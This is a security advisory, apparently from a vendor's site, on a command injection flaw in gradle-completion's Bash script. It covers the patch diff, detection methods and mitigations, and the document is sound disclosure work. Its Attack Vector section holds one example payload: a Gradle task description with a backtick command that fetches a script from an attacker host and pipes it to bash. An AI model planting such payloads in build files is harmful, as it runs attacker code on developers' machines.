CVE-2026-25063 Overview
A command injection vulnerability has been discovered in gradle-completion, a popular Bash and Zsh completion support tool for Gradle build automation. This vulnerability allows arbitrary code execution when a user triggers Bash tab completion in a project containing a malicious Gradle build file. The flaw exists in how the gradle-completion script for Bash handles Gradle task names and task descriptions without adequate sanitization.
Critical Impact
Attackers can execute arbitrary code on a developer's machine simply by having them trigger Bash tab completion in a directory containing a malicious Gradle build file, without the user explicitly running any build tasks.
Affected Products
- gradle-completion versions up to and including 9.3.0
- Bash shell environments with gradle-completion installed
- Systems using Bash completion for Gradle projects
Discovery Timeline
- 2026-01-29 - CVE CVE-2026-25063 published to NVD
- 2026-01-29 - Last updated in NVD database
Technical Details for CVE-2026-25063
Vulnerability Analysis
This command injection vulnerability (CWE-78) exploits insufficient input sanitization in the gradle-completion Bash script. When a user presses tab to autocomplete Gradle commands, the script reads task information from cached data and processes it in an unsafe manner. The vulnerable code uses command substitution $(...) and word splitting when reading task names and descriptions from cache files.
The core issue lies in how Bash arrays are populated from cached task data. The original implementation used patterns like cached_tasks=( $(grep -v "^:" "$cache_dir/$cached_checksum") ) which performs word splitting and glob expansion on the output. If a malicious Gradle build file includes task descriptions containing backtick-enclosed commands (e.g., `malicious-command`), those commands would be executed during the completion process.
This attack requires local access—specifically, an attacker must plant a malicious build.gradle file in a directory where the victim will use tab completion. This could occur through supply chain attacks on shared repositories or by tricking users into cloning malicious projects.
Root Cause
The root cause is improper handling of untrusted input during Bash array population. The vulnerable code path uses command substitution combined with word splitting to populate the cached_tasks array and construct completion replies. Bash interprets backticks and $(...) constructs within these contexts, leading to command execution when processing task descriptions that contain embedded shell commands.
Attack Vector
The attack requires local access to plant a malicious Gradle build file in a project directory. When a developer navigates to that directory and attempts to use Bash tab completion for Gradle commands (e.g., typing gradle and pressing Tab), the completion script processes task metadata from the build file. A carefully crafted task description containing backtick-enclosed commands triggers arbitrary code execution in the context of the user's shell session.
For example, a malicious Gradle build file could define a task with a description like:
description = "Build task `curl attacker.com/steal.sh|bash`"
When the completion script processes this description to display available tasks, the backtick-enclosed command executes.
The security patch replaces unsafe array population with readarray -t:
local cached_checksum="$(cat "$cache_dir/$cache_name.md5")"
local -a cached_tasks
if [[ -z "$cur" ]]; then
- cached_tasks=( $(grep -v "^:" "$cache_dir/$cached_checksum") )
+ readarray -t cached_tasks < <(grep -v "^:" "$cache_dir/$cached_checksum")
else
- cached_tasks=( $(grep "^$cur" "$cache_dir/$cached_checksum") )
+ readarray -t cached_tasks < <(grep "^$cur" "$cache_dir/$cached_checksum")
fi
- COMPREPLY=( $(compgen -W "${cached_tasks[*]}" -- "$cur") )
+ COMPREPLY=( "${cached_tasks[@]}" )
else
__gradle-notify-tasks-cache-build
fi
Source: GitHub Commit Reference
Detection Methods for CVE-2026-25063
Indicators of Compromise
- Unexpected process spawning during Gradle tab completion operations
- Network connections initiated from Bash shell processes without explicit user commands
- Modified or suspicious build.gradle or build.gradle.kts files with unusual task descriptions containing backticks or shell metacharacters
- Evidence of command execution in shell history that the user did not explicitly run
Detection Strategies
- Monitor for child process creation from Bash completion functions, particularly unexpected network utilities or script interpreters
- Implement file integrity monitoring on Gradle build files in development environments
- Scan repositories for Gradle build files containing suspicious patterns in task descriptions (backticks, $(...) constructs)
- Use endpoint detection to identify unusual process trees originating from interactive shell sessions
Monitoring Recommendations
- Enable process auditing on developer workstations to detect unexpected command execution during shell operations
- Implement alerting for network connections from shell processes that lack explicit user-initiated commands
- Review Gradle project dependencies and build files when cloning new repositories
- Consider using SentinelOne's behavioral AI to detect anomalous process execution patterns during development activities
How to Mitigate CVE-2026-25063
Immediate Actions Required
- Update gradle-completion to version 9.3.1 or later immediately
- Audit all Gradle projects for suspicious task descriptions in build files
- Review recently cloned or updated repositories for potentially malicious build configurations
- Temporarily disable Bash completion for Gradle if immediate patching is not possible
Patch Information
The vulnerability has been fixed in gradle-completion version 9.3.1. The patch replaces unsafe command substitution with readarray -t for safe array population, preventing shell interpretation of special characters in task data. The fix is available in commit ecacc32bb882210e5d37cd79a74de1af0d0ccad7.
For detailed security information, refer to the GitHub Security Advisory GHSA-qggc-44r3-cjgv.
Workarounds
- Remove gradle-completion from .bashrc or .bash_profile to disable Bash completion for Gradle until patching is complete
- Switch to Zsh completion which is not affected by this vulnerability
- Manually inspect build.gradle files before using tab completion in untrusted projects
- Use a sandboxed or containerized development environment when working with untrusted Gradle projects
# Temporarily disable gradle-completion in Bash
# Remove or comment out the following lines in ~/.bashrc or ~/.bash_profile:
# source /path/to/gradle-completion.bash
# To verify gradle-completion is disabled:
complete -p gradle 2>/dev/null || echo "Gradle completion disabled"
# After updating to 9.3.1, re-enable by adding:
# source /path/to/gradle-completion.bash
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
